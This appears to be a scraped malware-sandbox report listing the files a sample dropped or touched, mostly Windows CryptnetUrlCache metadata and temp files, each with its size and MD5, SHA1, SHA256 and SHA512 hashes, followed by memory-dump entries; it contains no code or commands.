Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
27467ce9fa42db961045f7de3fb2f8b0

SHA1
09c79d13f68977daee8a10652abadb4c7088490c

SHA256
26657b7fea1f2696dc0dd451db1f8adb5f7b50a629709b5b4266e1767ef61369

SHA512
99b08dcffe1fa13e6913acca4fe2f12ff9308daf694481edd500a1cb2b382261f379a488eda0450b8b6ea75287e16d7f3c8ea9569a2d4902bec9479f27726aac

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
0a3beb2637e33db44c8507771ad175f8

SHA1
6486c96a6fa28824d18de106360c6473019b5c5d

SHA256
cc3b38ded236bad3177d46630bb6bda306789f3eed0fba21b52ca477befe2706

SHA512
5edf8381b91315443afc3537e786d73651c616a5ebc71a48978d66d50fe1b705283eb8b86107413520b2f513b6daa3dd32ab7a0cdf309def3afc1eebbf069906

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
d58d2fe5b200631b59d265b41a3f9d75

SHA1
b08988e423dbb347957eacca059b420dedd1f12f

SHA256
91bd12e11e16fba8a81edc6c1aa305c52b57ca22b399a33ef89a2fb2dda45188

SHA512
f9569856b26d8d4ca4ff892e68f11c0235220b113498322d0b1fa7b44848f2305669bebd9f7e571cf2bae017531e62453a5c20d1198cee933e28807ba0f4ee5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
1978edd62c209c2315fee672e1119832

SHA1
e269150d18c1fef1edbce6e836ed07d546936e62

SHA256
068260146966a9eec071670a139aecca34995d2ad5dafcb0acbc3a32cf0ab45e

SHA512
04de25917a29023f5cb01bc69903bc8ee19452b755513617087e2e4633490d049be31984267df83f7bc06d28cbe5cc2fdb74e5a07f8a5e5b6582e4d83d819249

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
c5bdd7a880a73b5004d348b90382b313

SHA1
956828c3516b96e4d6f303d843c44dc7764a6f3f

SHA256
b0a5bfdd51bd750bee229090c04a09111a3814ec1bf645c5afff2bf9af8a5961

SHA512
45e6cbcb08e00adca9e6e3e52cb4cb65d20373e6e6241bc012a734c0c5d5bf0ec9bcd100c1d26698c84383ad494a92bb519fd2e548ce8c7ecd430f3d4c9125cc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
7669a097396edf289b7c1b26852d31f8

SHA1
983e643f6f44b5fc39b0c62f20836046a4730d64

SHA256
bae9e6a03c761f743af33114977db612e9c6fd6d12f947eb4393b39157dfcfa2

SHA512
52c1dc27b52bd9637572de593d1280fa60a972fc614c676562d383e947976797926d7327fb72910be164087f3db27000b7cce631e644e2c93aa89285cd8bc13d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
e47bfc32089c446b0d32b73302e6059b

SHA1
bc7d81f46ee7fc5d5df1d7673c7397816dbc1eae

SHA256
7d3170db49e21839b56634319e01e5997b3c1e961d84c906ad5d028c4c145018

SHA512
0337daac8c2a3377a686f1418b38aa7173652d735464b7b08c4a5d2d8e73bc493d3731fd3f9e53d9d931739a7c5159019cf8f3b83c7dd37b3c280c5ced4fc45d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
ccfbbb776bbdebcbf61c7aaf6d64c12b

SHA1
6ee2be15265d69feccd2163624e25686e2e28ad6

SHA256
3105792d2669d416dc45cd72eabd3cba5fda282a90084496548ba07f43ded75e

SHA512
6c6ba87fe40ca0e6791492c244cfdbf79890c07d47e5122af38ad47753122d970d140969b028971c9fd7352f51feebecb35d0d4911a0dbb63b5d364a5c554111

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
7ee0960a73fcb0a5f2ece69d6dd01a0c

SHA1
403b4d214319adc936431eb648d98953030f4c2c

SHA256
0d11e32630265054ddf6231066c2e3e143739cf2b3edff42986defe708dae242

SHA512
f963073641275583a376e48ac6e39e67dc9475bcc820b76a548016593365ecc3c9691db87e6027795f375f76b9a20800ed6249516a13475da7389ffddc950997

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
adceb2e8323f4ff9922e55caa1ceb5f9

SHA1
ba61e6f53fe40db1a59caf318d7130432c69c2cb

SHA256
21209e905f67c40ca9a98b4f6e8e54610a06d0d886eb3478bd78ca3cc12795e4

SHA512
8e4daa8d44515b52d6f847bbf1afa213d658450dbc34c88c02633d79bfcfbf54b16a9e84585257c0c2d06f6fd75c5d979e0fc8abb3495807ea2d99d72c166dba

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
90ccbd70fe82217d9450c3dc7fb2adbd

SHA1
ec36f71fe2ec4e3ae35154de2c0af838a5a4eb7b

SHA256
ec9ff1351e9be2b61c004315889c95a378f24dcb0f9e0b351697b09648c26586

SHA512
7bebd19cbfd1a9ccc6f3baf5ad8d232e2c7db90480b7d76e683300cc2630faf367576a3d5c42e271cc18925dfc1d8739433d204bcf6ca40516b64f5a96ad068a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
b44ee64add13781565489865f99432e7

SHA1
a24dbf1bbc4fef5c9fdd66e0e248ab911fbb5d62

SHA256
435702a412c8971721566190b5e24d43fe6e802576dd82756dd0d98f42219e46

SHA512
d2245f2599c3e5d02b7e3793d85e8911fa87d25471dc25881f26bd6261b8bd0da9b198577b58702ca213ca1e61d985652087202b7322790a4a6c617272d39655

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
0de7f87619946ee85f1f05c888cc0edc

SHA1
fc6ce28ad61a534a5a1eb978535c2d4ee41a2f66

SHA256
f95c9e46e980f5237289a425942c09f30495c1d7f5784f38abe7f80828e934bd

SHA512
912afa68c591c867d30a672d3aeb98e0fab9973a23a1035f6597f59dfe5c13aa90faf284e781993e516411b7b4776235cadc5aa4f911b6dfeb127c359a14d351

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
29fb25c9f7bbba495afc50ed5619a286

SHA1
2703305ca317ef09969d7aa3015d07a3b57250f3

SHA256
d091635113f2e92f7696ae93bae36e8b438b4a56108dd9998cb40d5fb119fdb5

SHA512
657bf172485df570605c3331cbd145548e5e6e27bbfad3a2b58ce4f6e64b8e6d883b653488db41feb9fbd7f2fa81fc8893c46fd99c49cd371af3a15bfa083086

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
4d91ed20c02e07b92f6df845c6836ab2

SHA1
773acee9f4f0ef1124600f1b394a1ae64f81dafb

SHA256
5c384f347ff9ea767fbc92a9f9f87e94d31567b7a409527989ffc9333576a970

SHA512
77d210bb454be4f4a6d4e678df157c9e3385a182dc07902665ca4429350a35c929f7d15a41f05aa1960611bbf4c5a61aa9e6e856b7bb36e670bc787ba28d253f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
e8bd4c05d3a1fcad728636c7674ffb5d

SHA1
23656d1cdf4b19a1ec192f2836ff30172fb2d222

SHA256
b865a4f9a569a925a710014b666cc531d0b192df0fedbdd40a4e2e0703569032

SHA512
6506de90f5d2cd931ece3a67583c1bffb2433c571d07ef546156d7dc7a9268294bfbf913ef7572624de9b558654b90894a0619772498e7d006906c884f67da7e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
b9a1042534ad94043c7b28bf40f1d030

SHA1
3bfc05215e8ab3f5bb5f3a24517b595751a4ae02

SHA256
99868ad97619d0df8799256f2f5affa18c97d21aed76d91649ffe5acf6ab43f1

SHA512
1b8bace6c6d8c4821b359c53125aa6307fb147882e57b00570dba61fcef5331007fbe11edbf9e199e47acdf99cc78a3a56e23c5aa339d37f834a316aa014a1f8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
d121759df53fd5df6c9b118b9ae8b2e2

SHA1
1156479021ba0622b1ed7514b20a059edcdaef29

SHA256
f56949ca72375cbd92be05fda37678866ad5459ef3482d1833a3c42e4c79ca41

SHA512
4cf1c884b8a120162088b98852aaa0405f9675e6f9e57dae1a2c9e773fbca63ff958951bf576f5259bfaa65dcd0dfa3a3d6f746f465152f5610928214ebe810c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
9b7e08f58ea39322ce93d4163b2e10d1

SHA1
7820b0394b39471f202e5aaa2252719132344a20

SHA256
409191333d980de55c7f4d3d789c83d3ac6f6164ce31d0b8a39ee2bedac4ab6c

SHA512
5e0476c8e18cec4e1739447a6c31b6ed9f6d4b0c54861ef92639bc5f3ae8207e248a481019090f31b2e5635f7342fcdfad5af3bba9fdc7b06df197023193c295

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
f5ec8a28f02b76f5e091239c0157a637

SHA1
18b907cd73bf7c06e92a97f051f3577193945eb4

SHA256
412db8237beaf575adcee0ac2af85b381cc6fb27eb0d1c6b8024945f12acb72c

SHA512
5aa617441497c37f607ed163f1c85a0adfde06bfe0c1e0f993064a28f3e3816c461b2d891ad3f74ae532f7ef9fecd15ae0033f6840cb0d9528653f86a1ee5b97

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2177.tmp
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2207.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
memory/1992-1218-0x0000000070FFD000-0x0000000071008000-memory.dmp

Filesize
44KB

Download
memory/1992-0-0x000000002F481000-0x000000002F482000-memory.dmp

Filesize
4KB

Download
memory/1992-2-0x0000000070FFD000-0x0000000071008000-memory.dmp

Filesize
44KB

Download
memory/1992-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download